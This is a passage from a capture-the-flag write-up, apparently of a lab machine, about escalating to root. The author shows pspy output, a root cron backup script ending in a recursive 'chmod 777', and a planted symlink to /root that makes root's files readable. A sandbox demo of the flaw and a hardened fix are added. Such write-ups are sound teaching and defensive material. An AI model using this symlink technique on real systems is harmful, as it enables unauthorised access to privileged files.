2020/04/11 10:45:54 CMD: UID=33 PID=844 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33 PID=843 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33 PID=842 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33 PID=841 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=0 PID=838 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=0 PID=8 |
2020/04/11 10:45:54 CMD: UID=107 PID=710 | /usr/sbin/mysqld
2020/04/11 10:45:54 CMD: UID=0 PID=7 |
2020/04/11 10:45:54 CMD: UID=0 PID=551 | /sbin/agetty --noclear tty1 linux
2020/04/11 10:45:54 CMD: UID=0 PID=5 |
2020/04/11 10:45:54 CMD: UID=0 PID=422 | /usr/sbin/rsyslogd -n
2020/04/11 10:45:54 CMD: UID=0 PID=421 | /lib/systemd/systemd-logind
2020/04/11 10:45:54 CMD: UID=0 PID=42 |
2020/04/11 10:45:54 CMD: UID=105 PID=414 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
2020/04/11 10:45:54 CMD: UID=0 PID=413 | /usr/bin/VGAuthService
2020/04/11 10:45:54 CMD: UID=0 PID=412 | /usr/sbin/cron -f
2020/04/11 10:45:54 CMD: UID=0 PID=41 |
2020/04/11 10:45:54 CMD: UID=100 PID=402 | /lib/systemd/systemd-timesyncd
2020/04/11 10:45:54 CMD: UID=0 PID=3 |
2020/04/11 10:45:54 CMD: UID=0 PID=299 |
2020/04/11 10:45:54 CMD: UID=0 PID=29 |
2020/04/11 10:45:54 CMD: UID=0 PID=28 |
2020/04/11 10:45:54 CMD: UID=0 PID=27 |
2020/04/11 10:45:54 CMD: UID=0 PID=26 |
2020/04/11 10:45:54 CMD: UID=0 PID=25 |
2020/04/11 10:45:54 CMD: UID=0 PID=24 |
2020/04/11 10:45:54 CMD: UID=0 PID=23 |
2020/04/11 10:45:54 CMD: UID=0 PID=229 | /lib/systemd/systemd-udevd
2020/04/11 10:45:54 CMD: UID=0 PID=22 |
2020/04/11 10:45:54 CMD: UID=0 PID=21 |
2020/04/11 10:45:54 CMD: UID=0 PID=202 |
2020/04/11 10:45:54 CMD: UID=0 PID=201 | /usr/bin/vmtoolsd
2020/04/11 10:45:54 CMD: UID=0 PID=2 |
2020/04/11 10:45:54 CMD: UID=0 PID=199 | /lib/systemd/systemd-journald
2020/04/11 10:45:54 CMD: UID=0 PID=19 |
2020/04/11 10:45:54 CMD: UID=0 PID=18 |
2020/04/11 10:45:54 CMD: UID=0 PID=175 |
2020/04/11 10:45:54 CMD: UID=0 PID=174 |
2020/04/11 10:45:54 CMD: UID=0 PID=17 |
2020/04/11 10:45:54 CMD: UID=0 PID=16 |
2020/04/11 10:45:54 CMD: UID=0 PID=15 |
2020/04/11 10:45:54 CMD: UID=0 PID=140 |
2020/04/11 10:45:54 CMD: UID=0 PID=14 |
2020/04/11 10:45:54 CMD: UID=0 PID=138 |
2020/04/11 10:45:54 CMD: UID=0 PID=13 |
2020/04/11 10:45:54 CMD: UID=1000 PID=1291 | ./pspy64
2020/04/11 10:45:54 CMD: UID=0 PID=126 |
2020/04/11 10:45:54 CMD: UID=0 PID=1258 |
2020/04/11 10:45:54 CMD: UID=0 PID=124 |
2020/04/11 10:45:54 CMD: UID=0 PID=1227 |
2020/04/11 10:45:54 CMD: UID=0 PID=122 |
2020/04/11 10:45:54 CMD: UID=0 PID=120 |
2020/04/11 10:45:54 CMD: UID=0 PID=12 |
2020/04/11 10:45:54 CMD: UID=0 PID=118 |
2020/04/11 10:45:54 CMD: UID=0 PID=117 |
2020/04/11 10:45:54 CMD: UID=0 PID=1151 |
2020/04/11 10:45:54 CMD: UID=0 PID=115 |
2020/04/11 10:45:54 CMD: UID=0 PID=114 |
2020/04/11 10:45:54 CMD: UID=0 PID=1102 |
2020/04/11 10:45:54 CMD: UID=0 PID=11 |
2020/04/11 10:45:54 CMD: UID=0 PID=10 |
2020/04/11 10:45:54 CMD: UID=0 PID=1 | /sbin/init
2020/04/11 10:46:01 CMD: UID=0 PID=1299 | /usr/sbin/CRON -f
2020/04/11 10:46:01 CMD: UID=0 PID=1300 | /usr/sbin/CRON -f
2020/04/11 10:46:01 CMD: UID=0 PID=1301 | /bin/sh -c /usr/bin/backup.sh
2020/04/11 10:46:01 CMD: UID=0 PID=1302 | /bin/bash /usr/bin/backup.sh
2020/04/11 10:46:01 CMD: UID=0 PID=1304 | /bin/sh -c gzip
2020/04/11 10:46:01 CMD: UID=0 PID=1303 | /bin/sh -c gzip
2020/04/11 10:46:01 CMD: UID=0 PID=1305 | /bin/bash /usr/bin/backup.sh
2020/04/11 10:46:01 CMD: UID=0 PID=1306 | tar -xf backup_courses.tar.gz
2020/04/11 10:46:01 CMD: UID=0 PID=1307 | /bin/bash /usr/bin/backup.sh
Sure enough, /usr/bin/backup.sh is being executed.
Investigating /usr/bin/backup.sh
giovanni@teacher:/usr/bin$ cat backup.sh
cat backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;
This is what it contains.
The common pattern is that backup.sh is writeable, so you modify it and let root run it, but it was not writeable.
What to look at here is the final chmod 777 * -R; it changes the permissions of everything under tmp.
So, with the ln command, create an entry in tmp that links to /root.
giovanni@teacher:~/work/tmp$ ln -s /root hoge
ln -s /root hoge
Now wait a little for the cronjob to run. Then:
drwxrwxrwx 3 root root 4096 Nov 4 2018 root
The permissions have been changed, so root.txt can now be read.
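As an added example (not from the write-up or the machine itself): the same chmod-over-a-glob flaw reproduced in a throwaway directory without root, beside a hardened pass that refuses to run when a symlink is present and never dereferences links. The names protected and hoge are stand-ins for /root and the planted link.

```shell
#!/bin/sh
# Added example, not from the write-up or the machine: reproduce the flaw in
# backup.sh in a throwaway directory (no root needed), then show a hardened
# pass. "protected" stands in for /root and "hoge" for the planted link.
set -u

# Builds the sandbox and prints its path. Layout mirrors ~/work/tmp:
#   $sb/protected/root.txt          mode 700 dir, 600 file (our "/root")
#   $sb/tmp/courses/algebra/answersAlgebra
#   $sb/tmp/hoge -> $sb/protected   the symlink dropped into tmp
setup_sandbox() {
  sb=$(mktemp -d)
  mkdir -p "$sb/protected" "$sb/tmp/courses/algebra"
  echo secret > "$sb/protected/root.txt"
  chmod 600 "$sb/protected/root.txt"
  chmod 700 "$sb/protected"
  echo answers > "$sb/tmp/courses/algebra/answersAlgebra"
  ln -s "$sb/protected" "$sb/tmp/hoge"
  echo "$sb"
}

# Octal mode of a path (GNU stat first, BSD stat as fallback).
mode_of() { stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"; }

# What backup.sh does: the glob hands the link itself to chmod, and chmod
# dereferences links named on the command line before recursing into them,
# so the link target and everything below it become 777.
vulnerable_chmod() {
  ( cd "$1/tmp" && chmod -R 777 * )
}

# Hardened pass: abort if any symlink is present, then let find (which does
# not follow links) enumerate entries and skip link entries explicitly.
# 755 replaces the world-writable 777 the original used.
hardened_chmod() {
  ( cd "$1/tmp" || exit 1
    if find . -type l | grep -q .; then
      echo "refusing: symlink found under $PWD" >&2
      exit 1
    fi
    find . -mindepth 1 ! -type l -exec chmod 755 {} + )
}

# Stand-alone run: sh this_file.sh demo
if [ "${1:-}" = "demo" ]; then
  sb=$(setup_sandbox)
  echo "before: protected=$(mode_of "$sb/protected")"
  vulnerable_chmod "$sb"
  echo "after vulnerable pass: protected=$(mode_of "$sb/protected") root.txt=$(mode_of "$sb/protected/root.txt")"
  hardened_chmod "$sb" || echo "hardened pass refused to run"
  rm -rf "$sb"
fi
```

The real fix is not to run a recursive chmod as root over a directory a less privileged user can write to at all; the symlink check only limits the damage of that design.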
Closing
It was quite a hefty machine and a lot of fun!
There were several things I could not spot on my own, so I will keep working at it...!